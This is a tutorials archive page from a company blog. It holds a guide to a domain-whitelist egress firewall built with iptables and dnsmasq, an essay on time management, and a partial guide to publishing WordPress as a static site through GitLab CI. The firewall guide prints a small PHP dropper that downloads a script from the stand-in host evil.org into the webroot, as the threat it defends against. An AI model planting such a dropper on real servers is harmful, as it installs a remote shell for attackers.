Tutorials Archive - CraftCoders.app
https://craftcoders.app/category/tutorials/

Building a simple domain name based firewall for egress filtering on Linux with iptables and dnsmasq
https://craftcoders.app/building-a-simple-domain-name-based-firewall-for-egress-filtering/ (Mon, 16 Aug 2021)

This blog post shows you how to build a simple firewall on a Linux system that only allows requests to a list of whitelisted domains, using dnsmasq and iptables. The newer nftables, which replaces iptables, will also work via its iptables compatibility layer (iptables-nft).

To follow this blog post you will need to have basic knowledge of networking and *NIX systems.

Background Story

Recently we had to secure a server that runs a WordPress-based application that stores tons of sensitive data. As anybody working in IT security will tell you, WordPress is a nightmare when it comes to security. Luckily only a small part of the application needed to be exposed to the internet at all, so we could hide most of it behind an authentication proxy with two-factor authentication. However, the application still had to process user input that was submitted over other channels (email, JSON import), so there were still avenues through which an exploit could reach our system without first going through the authentication proxy. And of course exploits that target the authenticated client (XSS, CSRF) remain an issue.

So we asked ourselves what else we could do to further mitigate the risk of an infection. One of the things we discussed was an egress filter that only lets requests pass through to a set of whitelisted domains.

Why do you want to do that?

The goal of most attacks on web applications is to execute code on the web server. In the context of PHP applications this usually means executing PHP code. There are thousands of bots out there that scan the web all day long for known vulnerabilities, exploit systems and install some sort of PHP malware on them. In the PHP world most of these scripts are referred to as web shells. They allow an attacker to steal data from your system, spread SPAM or participate in DDOS attacks. The thing is, these scripts are often rather large: multiple kilobytes and more. Most exploits on the web take place over URL parameters, form submissions or file uploads. Except for the last one, these usually only allow very small payloads, especially if you set a short URL limit. That’s why attackers will usually use an exploit to deploy a short virus dropper that downloads the actual malware from the internet. The code of a simple non-obfuscated dropper could look like this:

<?php
$virus = file_get_contents('http://evil.org/virus.php');
file_put_contents('/var/www/html/virus.php', $virus);

This would try to download an evil PHP script from http://evil.org/virus.php and try to save that to the webroot. If the dropper succeeds the attacker could then access the remote shell at http://yourdomain.tld/virus.php.

Here is where output filtering in the firewall can help you. If the firewall blocks the connection to http://evil.org, the dropper will fail, and even though the attacker has successfully found an exploit in your web app there will be no damage. Of course, in many cases an attacker could still modify the attack so that it works without downloading anything from the internet. But at this point most bots will fail and most humans will decide that you are not worth the effort. Security is not absolute, despite what a lot of people in IT will tell you. There is no bike lock that can’t be defeated in a matter of minutes, but you still lock your bike, don’t you? And when the bike standing next to yours is better and has a worse lock, a thief will probably take that bike before taking yours. It is all about protecting your stuff to the level where an attack is not economically sound.

An outbound filter can also help you in a few other scenarios. It can stop spammers from trying to connect to an SMTP server, and it can stop exploits that trick PHP into opening a URL instead of a file, or into opening the wrong URL. And it can help to protect your private data from being sent to diagnostics websites or ad servers.

Think of an outbound filter as one tool of many to fight against attacks. It should not be your only measure, and it will not save your ass in all situations.

Whitelisting ip addresses for outbound traffic with iptables & ipset

The Linux kernel has a built-in firewall. We can configure it with the iptables command. The kernel also allows us to maintain IP sets (lists of IP addresses and networks) to match against, which we can manage with the ipset command. On Debian we can install both tools with:

# apt-get install iptables ipset

For this guide we will assume that the interface you want to filter outgoing traffic on is called eth0. This should be the case on most servers, but your interface may be named differently. You can check with ifconfig.

Warning: It is very important that you are careful with the commands listed below. If you do it wrong you can easily lock yourself out of your server by blocking ssh.

First let’s make our life simple and disable IPv6 support on our server, because we are lazy and we really don’t want to deal with IPv6 unless we have to 😉 On Debian we can do this with sysctl.

# echo 'net.ipv6.conf.all.disable_ipv6 = 1' > /etc/sysctl.d/70-disable-ipv6.conf
# sysctl -p -f /etc/sysctl.d/70-disable-ipv6.conf

Next let’s start the actual work by creating a new ip set called whitelist:

# ipset create whitelist hash:net

First we need to make sure that we only block outgoing traffic for newly created connections and not for connections that have been established from the outside like SSH:

# iptables -o eth0 -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

If your server gets configured via DHCP you will also want to allow all DHCP requests:

# iptables -o eth0 -I OUTPUT -p udp --dport 67:68 --sport 67:68 -j ACCEPT

Next let’s allow all traffic to private IP networks. You can of course decide for yourself if you want that. In our case we are on an AWS Lightsail server and a lot of the servers we need to reach, like the NTP time server, are in the private IP range, and we want to allow them by default. We only really care about blocking access to the internet:

# iptables -o eth0 -A OUTPUT -d 10.0.0.0/8 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 172.16.0.0/12 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 192.168.0.0/16 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 169.254.0.0/16 -j ACCEPT # link local

You may also want to allow traffic to the special broadcast and multicast IP addresses:

# iptables -o eth0 -A OUTPUT -d 255.255.255.255 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 224.0.0.22 -j ACCEPT

You should allow requests to your DNS servers. For example, to allow requests to the Google nameservers (8.8.8.8, 8.8.4.4) add the following:

# iptables -o eth0 -A OUTPUT -d 8.8.8.8 -p udp --dport 53 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 8.8.4.4 -p udp --dport 53 -j ACCEPT

Now we want to allow all traffic to ip addresses that are on the whitelist that we have created above:

# iptables -o eth0 -A OUTPUT -m set --match-set whitelist dst -j ACCEPT

Now you can add all the IP addresses that you want to allow requests to. For example, let’s add the address 194.8.197.22 (mirror.netcologne.de) to the whitelist:

# ipset add whitelist 194.8.197.22

Finally, let’s block all other outgoing traffic. Only execute this command if you are sure you have configured all the rules properly (you can check with iptables -L). If you did it wrong you may kill your SSH connection. The blocking rule needs to be the last rule in the list:

# iptables -o eth0 -A OUTPUT -j DROP

There you go, let’s hope you still have access to your server. If you don’t, a reboot should fix your issues, since all the settings get wiped after a reboot. If you did everything correctly and you execute iptables -L -n to list all the rules, the OUTPUT chain should look something like this:

# iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp spts:67:68 dpts:67:68
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     all  --  0.0.0.0/0            10.0.0.0/8
ACCEPT     all  --  0.0.0.0/0            172.16.0.0/12
ACCEPT     all  --  0.0.0.0/0            192.168.0.0/16
ACCEPT     all  --  0.0.0.0/0            169.254.0.0/16
ACCEPT     all  --  0.0.0.0/0            255.255.255.255
ACCEPT     all  --  0.0.0.0/0            224.0.0.22
ACCEPT     udp  --  0.0.0.0/0            8.8.8.8              udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            8.8.4.4              udp dpt:53
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            match-set whitelist dst
DROP       all  --  0.0.0.0/0            0.0.0.0/0

That’s it: now all outgoing traffic to IPs that are not on the whitelist will be blocked by the firewall. All rules will however get reset after a reboot. To make the rules permanent you need to add the commands to a startup script or make the rules persistent using iptables-persistent (on newer systems netfilter-persistent) and ipset-persistent.
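If you go down the persistence route, a minimal sketch on Debian could look like the following. The ipsets file path is an assumption based on how the ipset-persistent plugin is commonly packaged, so double-check it on your release; the whitelist set has to be restored before the iptables rules, because the ACCEPT rule references it:

# apt-get install iptables-persistent ipset-persistent
# ipset save > /etc/iptables/ipsets
# iptables-save > /etc/iptables/rules.v4

Alternatively, running netfilter-persistent save after installing the packages should let the installed plugins write these files for you.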

DNS Filtering

There is an issue, however, with our simple iptables filter: it can only work with IP addresses, not domain names. On the web we seldom know the IP addresses of web services in advance. Instead, we connect to a domain name like example.org. The domain name gets resolved to an IP address by DNS, and addresses may change over time. Even worse, most services these days don’t even have fixed IP addresses, so an IP address filter alone may not solve your problem. iptables and ipset simply cannot work with domain names. You can specify a domain name during rule creation, but it will instantly get resolved to an IP address.
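You can see this for yourself. The following is only an illustration; whatever addresses the name resolves to at that very moment is what ends up in the rule:

# iptables -o eth0 -A OUTPUT -d example.org -j ACCEPT
# iptables -L OUTPUT -n

The listing will show the resolved IP address(es) instead of the name, and the rule will not follow future DNS changes.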

A simple alternative to an ip-based filter is DNS filtering. The idea being you simply block DNS requests for domains you don’t want to allow requests to.

We can configure a simple dns whitelist filter with dnsmasq. Dnsmasq is a software that can provide DNS and DHCP services to a local network. We will only use it as a dns server listening on 127.0.0.1 that forwards dns requests for whitelisted domains.

You can install dnsmasq on Debian with:

# apt-get install dnsmasq

After installing dnsmasq you will need to adjust the configuration file in /etc/dnsmasq.conf. For example, to only allow traffic to mirror.netcologne.de and example.org the file could look like this:

no-resolv
server=/mirror.netcologne.de/8.8.8.8
server=/mirror.netcologne.de/8.8.4.4
server=/example.org/8.8.8.8
server=/example.org/8.8.4.4

This will tell dnsmasq not to resolve DNS queries in general (no-resolv) and to resolve the addresses mirror.netcologne.de and example.org using the DNS servers 8.8.8.8 and 8.8.4.4 (Google DNS). After changing the configuration you will need to restart dnsmasq:

# systemctl restart dnsmasq

You can test your dns server with the dig command:

$ dig A www.example.org @127.0.0.1
$ dig A google.com @127.0.0.1

If you have done everything correctly the first query for www.example.org should return an ip address but the second query for google.com should fail.

To make your system use dnsmasq as dns server you will need to add it to /etc/resolv.conf:

nameserver 127.0.0.1

If you use DHCP, your /etc/resolv.conf will probably get overwritten after a while or on restart. To prevent that you can configure the DHCP client to leave the /etc/resolv.conf file alone. On Debian you can do this with the following commands:

# echo 'make_resolv_conf() { :; }' > /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone
# chmod 755 /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone

That’s it, you should now have a working DNS whitelist filter.

Combining dns filtering and ip filtering

There is an issue with DNS filtering, however: it’s easy to circumvent. All one has to do to bypass it is to specify the IP address directly, and lots of malware/attackers will do just that. This is why I wanted to combine both ideas: we use DNS filtering and automatically add the IP addresses returned by our DNS server to the whitelist ipset. This way we can implement a simple domain-name-based egress filter that blocks all other traffic.

Since my whitelist is relatively small (less than 100 entries) I decided to write a simple script that resolves all hosts on the whitelist, adds the IPs to the ipset and writes them to a hosts file that is read by dnsmasq. I then trigger this script via a cron job on a short interval, so that the IP addresses in the hosts file are always relatively fresh. That way dnsmasq will always return an IP address that has previously been whitelisted. Since DNS by design expects caching, cache times of a few minutes will not pose an issue.

Once a day at night another cron job scrubs the IP whitelist of all entries, so that outdated IPs that are no longer tied to the whitelisted DNS names are removed.
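To illustrate the idea, here is a stripped-down sketch of such a refresh script. It is not the script linked below: the domain list, the hosts file path and the matching addn-hosts= entry in dnsmasq.conf are assumptions made for the example.

#!/bin/bash
# Resolve every whitelisted domain and feed the results to ipset and dnsmasq.
DOMAINS="mirror.netcologne.de example.org"
HOSTS_FILE="/etc/dnsmasq-whitelist.hosts"   # assumes addn-hosts=/etc/dnsmasq-whitelist.hosts in dnsmasq.conf

> "${HOSTS_FILE}.tmp"
for domain in $DOMAINS; do
    for ip in $(dig +short @8.8.8.8 "$domain" A | grep -E '^[0-9.]+$'); do
        ipset -exist add whitelist "$ip"            # -exist: don't complain about duplicates
        echo "$ip $domain" >> "${HOSTS_FILE}.tmp"
    done
done
mv "${HOSTS_FILE}.tmp" "$HOSTS_FILE"
killall -HUP dnsmasq                                # SIGHUP makes dnsmasq re-read its hosts files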

I’ve put my code into an easy to use shell script. It includes all the code that you will need to configure iptables, dnsmasq and the cron jobs. You can find it here: https://gist.github.com/gellweiler/af81579fc121182dd157534359790d51.

To install it download it to /usr/local/sbin/configure-firewall.sh and make it executable:

# wget -O /usr/local/sbin/configure-firewall.sh "https://gist.githubusercontent.com/gellweiler/af81579fc121182dd157534359790d51/raw/d1906381462a81cea19c7f15a9d44843ff1ba27c/configure-firewall.sh"
# chmod 700 /usr/local/sbin/configure-firewall.sh

After installing the script you can modify the variables in the top section of the script with your favorite editor to set the domain names that you want to allow and to configure your DNS servers. By default the AWS Debian repos and the WordPress APIs are allowed.

To install all necessary packages (iptables, dnsmasq, dig) on debian you can run:

# /usr/local/sbin/configure-firewall.sh install

To disable ipv6 support on your system you can run:

# /usr/local/sbin/configure-firewall.sh disable_ipv6

To start the firewall you can execute the following command:

# /usr/local/sbin/configure-firewall.sh startup

This will configure iptables and dnsmasq. After that you can test the firewall.

To refresh the ip addresses after you made changes to the list of dns names in the top of the script or to update outdated dns results you can run:

# /usr/local/sbin/configure-firewall.sh refresh_ips

If you are happy with the result you can make the changes permanent with:

# /usr/local/sbin/configure-firewall.sh configure_cronjob

This will create 3 cronjobs: one that will run on startup, one that will refresh the ips every 10 minutes and one that will flush the ip whitelist at 4 o’clock in the morning.

Since I’m using the script on an AWS Lightsail server that has no recovery console, I’ve added a delay of 90 seconds to the startup cron job. That means the firewall only gets activated 90 seconds after boot. That way, if I ever mess up the firewall and lock myself out of SSH, I can reboot the server using the web console and have enough time to SSH into it and kill the script. It of course also means that the firewall will not run for a short time after booting: an acceptable risk for me, since I will only restart the server in very rare instances.
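For orientation, the resulting schedule could look roughly like the crontab sketch below. The first two subcommands are the ones shown above; the name of the nightly flush subcommand is a placeholder, the real one is defined in the script:

# /etc/cron.d/configure-firewall (sketch)
@reboot       root sleep 90 && /usr/local/sbin/configure-firewall.sh startup
*/10 * * * *  root /usr/local/sbin/configure-firewall.sh refresh_ips
0 4 * * *     root /usr/local/sbin/configure-firewall.sh flush_whitelist   # placeholder name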

Conclusion

Using iptables and dnsmasq we can hack together a simple DNS-based whitelist firewall for outgoing traffic. In this basic form only the A record is queried. The A record is used for most web services; if you rely on other records (for example the MX record for mail servers) you will have to adjust the script. Adding an egress filter can add some extra security to a web server. It is however not a silver bullet that will magically protect you against all exploits. Also, if you run the firewall on the web server itself and an attacker gains root access to your machine, he/she can simply disable the firewall.

 

Time Management: Doing Less lets you Achieve More
https://craftcoders.app/time-management-doing-less-lets-you-achieve-more/ (Mon, 14 Sep 2020)

“There is surely nothing quite so useless as doing with great efficiency what should not be done at all.” – Peter F. Drucker [1]

Effectiveness and Efficiency

Do you know the difference between effectiveness and efficiency? Effectiveness is the relationship between the goal achieved and the goal set, whereas efficiency is the ratio of the achieved goal to the effort. Thus effectiveness is a measure of usefulness and efficiency is one of economy. This is where it gets interesting, because the result of efficient work does not have to follow my set goals (or those of my company) and therefore does not have to be effective at the same time. Moreover, it often happens that we do bullshit efficiently. Checking e-mail 30 times a day and developing an elaborate system of rules and sophisticated techniques to ensure that these 30 brain farts are processed as quickly as possible is efficient, but far from effective [2]. We often assume that when people are busy, they work on important tasks, implying effectiveness. Unfortunately, this is often not true.

But why does this happen? In my opinion, two situations cause this behavior. The first and very rare situation is that there is nothing important to do. Now that we have to ask ourselves what to do next, we decide, more or less consciously and depending on whether we are at work or not, to do things that are not very effective. Taking a break or doing nothing is usually not an option, because we hate not using time and are afraid of social disregard (e.g. by colleagues). Someone who takes a break while others work is called lazy faster than he or she would like, even if it is not guaranteed that the others are working effectively. That’s why we prefer to do bullshit instead of taking a deliberate break, at least at work. But as already mentioned, this situation is quite rare, because many people look for new challenges if there is nothing important to do. The second situation is that there are a few critical tasks that would bring us closer to our (or the company’s) goals. Being busy is then used as an excuse to avoid these most unpleasant tasks. Effective work fails not because of the amount or complexity of tasks, but because of distraction and working on unimportant things. There are thousands of useless things you can do (efficiently): sort Outlook contacts, clean up the filing cabinet, write an unimportant report, and so on. Whereas it is difficult, for example, to call the head of department to say that something cannot be done as planned and that a new meeting with the customer is needed.

These considerations lead me to the following conclusion: it is much more important what you do than how you do it. Don’t get me wrong, efficiency is important. But you should consider it secondary in comparison to effectiveness. So now let’s have a look at Pareto’s Law, a rule that helps us identify important, critical tasks.

Pareto’s 80/20 Law

Pareto is a rather well-known and controversial economist. He became known mainly through the rule named after him: Pareto’s Law. The rule is explained quite simply: 80% of a result comes from 20% of the effort [3]. Depending on the context, you can find different variations of this, like

  • 80% of the consequences come from 20% of the causes,
  • 80% of the revenue comes from 20% of the products (and/or customers),
  • 80% of costs come from 20% of the purchases,

and so on. The exact ratio varies, and you find examples from 70/30 to 99/1. What matters is the large imbalance. Even though most people realize that this rule can’t apply to everything, and it is therefore discussed with good reason, Pareto makes a point here. Because of the circumstances already mentioned above, and a few more, we often tend to work ineffectively. This creates an imbalance between effort and useful results. The Pareto rule pushes us to identify, self-reflectively, where we waste time and to find out what is important for our goals. So try to answer the following questions for yourself:

  • What 20% causes 80% of my problems?
  • What 20% causes 80% of my useful outcomes?

or in a personal way:

  • What 20% causes 80% of my unhappiness?
  • Which 20% causes 80% of what makes me happy?

These questions can be used to identify critical tasks or circumstances and thus allow us to decide what we should do. Or, as in most cases, what we should let be, e.g. caring for a lot of customers who only generate a fraction of the revenue. Another simple question that helps us identify what we should do is the following: if you were only allowed to work two hours a day, which tasks would you do and which tasks would you avoid at all costs? This simple question helps to identify the critical tasks and leads us to the final topic: how to get shit done in time.

Parkinson’s Law

Time is wasted because there is so much of it [4]. As an employee, you are usually not free to choose how long you want to work each day; most people have to work between 8 and 12 hours. While working time matters in physical labor, for most creative, constructive, and conceptual jobs it acts more like a constraint. As you are obliged to be in the office, you create activities to fill the time. Being at work for 8 hours does not mean that you are creative for 8 hours, or even able to be creative for that long. Again, don’t get me wrong: there are days when you can work very effectively for a long time, but often in the context of deadlines. And that’s what Parkinson’s Law is about:

“Work expands so as to fill the time available for its completion” – C. Northcote Parkinson [5]

Or in other words: a task expands to the exact degree that time is available to complete it, not to the degree that it is actually complex [6]. If you had a day to deliver a project, the time pressure would force you to concentrate on your work and do only the most essential things. If you had 2 weeks for the same task, it would take you two weeks, and you would probably waste much more time on unimportant subtasks. This does not mean that we can do everything if we set the deadline short enough, but that we work much more effectively if we set ourselves tight deadlines.

Try it out

To sum it up in one sentence: doing less lets you achieve more! With Pareto, you can identify the few tasks that are critical for your goals. And according to Parkinson’s Law, you should shorten the work time so that you stick to these critical tasks and do not inflate them unnecessarily. Try it out! Choose a personal goal or your current company task. Ask yourself which the really important (sub-)tasks are (80/20 helps). Afterwards, shorten your time to work on these tasks to a limit (e.g. 2 hours a day) and set yourself a tight deadline to deliver. It is important that the deadline feels uncomfortable or even impossible. The goal is not to have everything done by tomorrow in some magical way, but to increase focus. When the deadline has passed, look at what you have achieved. Probably much more in less time.

One last note: in my opinion, these rules do not serve to maximize the time gained for other work, but to free it up. We should try to get the important things done in little time and use the remaining time for our interests and private life to keep a healthy balance. The goal is not to have 4 slots of 2-hour pure effectiveness, but to have one or two and not waste the rest of the (work) time.

Key Takeaways

  • Being busy is not equal to being effective. 
  • Being efficient does not imply being effective.
  • We use busyness to postpone critical and unpleasant tasks.
  • We use busyness to avoid apparent “time-loss” and social disregard.
  • It is much more important what you do than how you do it.
  • Pareto gives you the possibility to identify what you should do.
  • Parkinson’s Law lets you stay focused on the important things.
  • Doing less lets you achieve more.

Sources

[1] Peter Ferdinand Drucker: Managing for Business Effectiveness. Harvard Business Review. 3, May/June, 1963, P. 53–60 (hbr.org opened 04/09/2020).

[2] Timothy Ferriss, The 4-Hour Workweek, p. 69.

[3] Bunkley, Nick (March 3, 2008). “Joseph Juran, 103, Pioneer in Quality Control, Dies”, The New York Times. (opened 04/09/2020)

[4] Timothy Ferriss, The 4-Hour Workweek, p. 75.

[5] C. Northcote Parkinson, Parkinson’s Law, The Economist. 177, No. 5856, 19. November 1955, P. 635–637.

[6] M. Mohrmann: Bauvorhaben mithilfe von Lean Projektmanagement neu denken. 4. Auflage. BoD, 2011, ISBN 978-3-8391-4949-2, P. 55.

WordPress without the security hassles – using GitLab CI/CD to automate transforming WordPress into a static website
https://craftcoders.app/wordpress-vs-static-web-pages-the-best-of-both-worlds/ (Sun, 29 Mar 2020)

Recently we launched our new company website (craftcoders.app). It’s a simple website that showcases us and our work and describes the kind of services that we provide to customers. It requires no dynamic features except for the contact form.

We decided to build our website with WordPress, but to automatically generate a static copy of it and serve that to visitors, using GitLab CI/CD as our automation tool. This guide will explain how you can set up your own pipeline to generate a static website from a WordPress site on a regular schedule or manually. But first we’ll have a detailed look at the pros and cons of WordPress and static websites in the next section. Feel free to skip over it if this is not of interest to you.

The ups and downs of WordPress and static websites

At craft-coders we value efficiency, and we try to choose the right tool for the job. WordPress is the leading CMS for small websites. It’s easy to set up and deploy. At the time of writing ~35% of all websites on the internet are built with it. Because of its popularity there are tons of useful plugins and great themes available, so you can build good-looking, feature-rich websites really quickly.

But WordPress has its downsides. Mainly, it sucks at security. So famously, that about a fifth of the Wikipedia article on it focuses on its vulnerabilities. The plugin market for WordPress does not provide any quality checks, and if you look at the code base of most plugins (even some popular ones), any self-respecting programmer will scream out in agony.

Because of this we are very much against using WordPress for more than simple representational websites and blogs. Basically if your website is built on WordPress you must expect getting hacked. It’s therefore crucial that your WordPress installation is running on a server that isn’t storing any sensitive information about you or your customers and that you use passwords that are used nowhere else. If people really need to log into your website, then at best you use an external authentication service, so that no information about passwords is stored on your server.

Still, even if there is nothing of value to gain for a potential attacker, so that a targeted attack against your website is very unlikely and getting hacked is more a nuisance than an actual problem, you still need to take basic precautions. Due to the popularity of WordPress there are a lot of bots out there that just scan the web for known vulnerabilities. They try to hack as many web pages as possible and use them to spread SPAM emails, viruses and propaganda, or use your server to mine Bitcoins.

The most important thing that you must do to protect yourself from bots is to keep your WordPress installation and its plugins updated at all times. This can be very annoying, because updates may break things. And for most small websites the goal is often to deploy and forget. You don’t want to spend time fostering your site; you just want it to continue to function as expected and be done with it. The ultimate goal of every person in operations is to go unnoticed. If you have an admin who is constantly running around fixing stuff, he/she is probably not doing a good job, or has to compensate for the mistakes of the developers. You want things to work without needing to think about them.

While WordPress is the nightmare of every admin, static web pages are the dream of every person working in operations. They’re super easy to deploy, work super fast, can be kept in RAM, and requests can be distributed between as many servers as you like. Because there is no code running on the server, they are basically unhackable. Provided of course that your web server is secure, but since you can just rent a managed server this isn’t really an issue that you need to concern yourself with. Yes, attacks running in the client’s browser exploiting flaws in JavaScript or CSS are still feasible, but since a truly static website by definition has no valuable cookies or private information to steal, there is little to be gained by an attack of this kind (talking to authenticated REST services can change that picture, of course).

There are a few good static site generators out there, but as of now none of them provides an easy-to-use GUI and as many plugins/themes as WordPress. If your goal is to build a simple website fast, WordPress should still be your first choice. Also, if you decide to go with a static site generator there is no going back; your site will forever be static. Of course, you’re always free to use JavaScript to talk to REST services, and that is a good design choice, so this sounds more dramatic than it actually is.

To sum it up WordPress is great for editors and site-builders but it sucks in operations. In contrast, static web pages are hard to use by editors and usually require more development effort than WordPress, but they are great in operations. This is a classic development vs. operations issue.

Using WordPress to generate a static web page

What if you could have both? Why not have a private non-accessible installation of WordPress and from that generate a static copy. Then you can deploy that copy to a public accessible web space. That way you have the best of both worlds. Of course you deprive yourself of the dynamic features of WordPress, so no comment fields and no login sections, but if you don’t need any of that, this is a perfect solution for you. And if your requirements ever change you can always replace your static copy with the real thing and go on with it.

This is the basic idea. The first thing we tried was the WP2Static plugin, which aims at solving this issue, but we couldn’t get it running. We then decided to build our own solution using our favorite automation tool, GitLab CI/CD. We used gitlab.com, and at the moment they are offering 2000 free CI minutes to every customer, which is a really sweet deal. But any CI tool should do. You should not have many issues porting this guide to Jenkins or any other tool that can execute bash scripts. Also, we’re assuming you are using Apache (with mod_rewrite) as your web server and that you can use .htaccess files. But porting this concept to other web servers shouldn’t be too difficult.

You can find and fork the complete sample code here: https://gitlab.com/sgellweiler/demo-wordpress-static-copy.

Here is the plan in detail. We’re going to use the same domain and web space to host both the private WordPress installation and the publicly accessible static copy. We’re going to install WordPress into a sub directory that we protect with basic auth using a .htaccess file. This is the directory that all your editors, admins and developers will access. The GitLab job will crawl this installation using Wget and deploy the static copy via ssh+rsync into the directory /static on the web space. Then we will use the .htaccess file in the root directory to rewrite all requests to the root path into the static directory. You can configure the GitLab job to run every day, every hour or only manually, depending on your needs.
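To keep the moving parts straight, here is the resulting layout of the web space as used in this guide (the names are introduced in the following sections):

/.htaccess      rewrites requests into static/ and protects the WordPress directory with basic auth
/.htpasswd      the basic auth credentials
/wp_2789218/    the private WordPress installation (reachable via the /wp alias)
/static/        the generated static copy that visitors actually get served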

To follow this guide you should have access to a *NIX shell and have the basic Apache tools (htpasswd), ssh tools (ssh-keygen, ssh-keyscan), find, sed and GNU Wget installed. Some distros ship with a minimal Wget, so make sure that you have the feature-rich version of Wget installed (wget --version).

Setting up the web space

First install WordPress into a sub directory. For this guide I’m going with wp_2789218. You can go along with this name or choose your own; you should use a unique name though, a string that you will use nowhere else. Best add a few randomly generated chars in there. We’re not doing this for security but to make search+replace for URLs easier in the next step. If you go with your own folder name, remember to replace all occurrences of wp_2789218 in this guide with your folder name. We’ll also add a catchy alias /wp for you and your coworkers to remember, so don’t worry too much about the cryptic name.

Next we create a directory to store our static copy. We’ll just name that static/ and for now we’ll just add an index.html with <h1>Hello World</h1> in there.

Let’s configure Apache to password-protect our WordPress installation and to redirect requests to /static. First generate a .htpasswd file with user+password at the root level (or at another place) of your web space using:

htpasswd -c /home/pwww/.htpasswd yourusername

Next create a .htaccess on the root level with the following. You need to reference the .htpasswd file with an absolute path in the AuthUserFile:

RewriteEngine On
RewriteBase /

# Setup basic auth
AuthUserFile /var/www/httpdocs/.htpasswd
AuthType Basic
AuthName "Only for trusted employees"

# Require a password for the wp installation.
<RequireAny>
    Require expr %{REQUEST_URI} !~ m#^/wp_2789218#
    Require valid-user
</RequireAny>

# Add an easy to remember alias for the wp installation.
RewriteRule ^wp/(.*) wp_2789218/$1 [R=302,L]
RewriteRule ^wp$ wp_2789218/ [R=302,L]

# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it for the server config part. If you go to your.domain.tld then you should see the Hello World from the index.html in the static directory. If you go to your.domain.tld/wp you should get redirected to your WordPress installation and be forced to enter a password.

Generating a static copy of a website

To make a static copy of your website you need a crawler that starts at your start page, follows all links to sub pages and downloads them as HTML, including all CSS and JavaScript. We tried out several tools, and the one that performed best by far is the good old GNU Wget. It will reliably download all HTML, CSS, JS and IMG resources. But it will not execute JavaScript and will therefore fail to detect links generated through JavaScript. In that case you might run into problems. However, most simple WordPress sites should be fine from the get-go.

Let’s have a look at the Wget cmd we will use to generate a static copy of our WordPress site:

wget \
    -e robots=off \
    --recursive \
    -l inf \
    --page-requisites \
    --convert-links \
    --restrict-file-names=windows \
    --trust-server-names \
    --adjust-extension \
    --no-host-directories \
    --http-user="${HTTP_USER}" \
    --http-password="${HTTP_PASSWORD}" \
    "https://yourdomain.tld/wp_2789218/" \
    "https://yourdomain.tld/wp_2789218/robots.txt"

Here is an explanation of all the options in use:

  • -e robots=off
    Ignore instructions in the robots.txt.
    This is fine since we’re crawling our own website.
  • --recursive
    Follow links to sub directories.
  • -l inf
    Sets the recursion level depth to infinite.
  • --page-requisites
    Download stuff like CSS, JS, images, etc.
  • --convert-links
    Change absolute links to relative links.
  • --restrict-file-names=windows
    Change filenames to be compatible with (old) Windows. This is a useful option even if you’re not running on Windows or you will get really ugly names that can cause issues with Apache.
  • --trust-server-names
    Uses the filenames of redirects instead of the source url.
  • --no-host-directories
    Download files directly into wp_2789218 and not into yourdomain.tld.
  • --http-user
    The username used for basic auth to access the wp installation. As defined in your .htpasswd.
  • --http-password
    The password used for basic auth to access the wp installation. As defined in your .htpasswd.
  • "https://yourdomain.tld/wp_2789218/" "https://yourdomain.tld/wp_2789218/robots.txt"
    Lists of urls to download. We set this to the start page, Wget will recursively follow all links from there.
    We also copy the robots.txt along.

This will generate a static copy of your WordPress installation in wp_2789218. You can test if the crawling worked by opening the index.html in wp_2789218 with a browser.

Wget will try to rewrite URLs in HTML and CSS, but in meta tags, inside JavaScript and in other places it will fail to do so. This is where the unique name of our directory comes into play. Because we named it wp_2789218 and not wordpress, we can now safely search and replace through all files in the dump and replace every occurrence of wp_2789218/, wp_2789218\/, wp_2789218%2F and wp_2789218 with an empty string (""), so that the links are correct again in all places. We will use find+sed for that.

Here is the macOS variant of that:

LC_ALL=C find wp_2789218 -type f -exec sed -E -i '' 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

And here is the same for Linux with GNU sed:

find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

To save you the headache: the pattern (\\\/|%2F|\/)? matches /, \/, %2F and the empty string ("").

Deploying the static copy to a web space

Now that we have generated a static copy of our website, we want to deploy it to /static on the web space. You can do this over rsync+ssh, if you have ssh access to your server.

The command to do so looks like this:

rsync -avh --delete --checksum wp_2789218 "webspaceuser@yourdomain.tld:static"

Remember to adjust the user, domain and path to the directory in webspaceuser@yourdomain.tld:static to your needs.

For our automated deployment with Gitlab, you should create a new private/public ssh keypair using:

ssh-keygen -m PEM -N "" -C "Deploymentkey for yourdomain.tld" -f deploy

This will create the files deploy and deploy.pub in your current directory. Copy the contents of deploy.pub to ~/.ssh/authorized_keys on your remote server to allow SSH-ing into it with the new key. You can use this one-liner for that:

cat deploy.pub | ssh webspaceuser@yourdomain.tld -- 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat - >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

Next, test that you have set up everything correctly by SSH-ing to your web space with the new key:

ssh -i deploy webspaceuser@yourdomain.tld

For Gitlab you will need the signature of your remote ssh server. You can generate it with ssh-keyscan. Copy the output of that, because you will need it in the next step:

ssh-keyscan yourdomain.tld

Putting it all together

Now that we have established all the basics it’s time to put it all together in one gitlab-ci.yml file. But first we need to configure a few variables. On your Gitlab project go to Settings → CI/CD → Variables and create the following variables:

  • $SSH_ID_RSA
    This is the private key that will be used for rsync to upload the static dir. Put the contents of the deploy file that you created in the step before, in here.
    This should be of type File and state Protected.
  • $SSH_ID_RSA_PUB
    This is the public key that will be used for rsync to upload the static dir. Put the contents of the deploy.pub file that you created in the step before, in here.
    This should be of type File.
  • $SSH_KNOWN_HOSTS
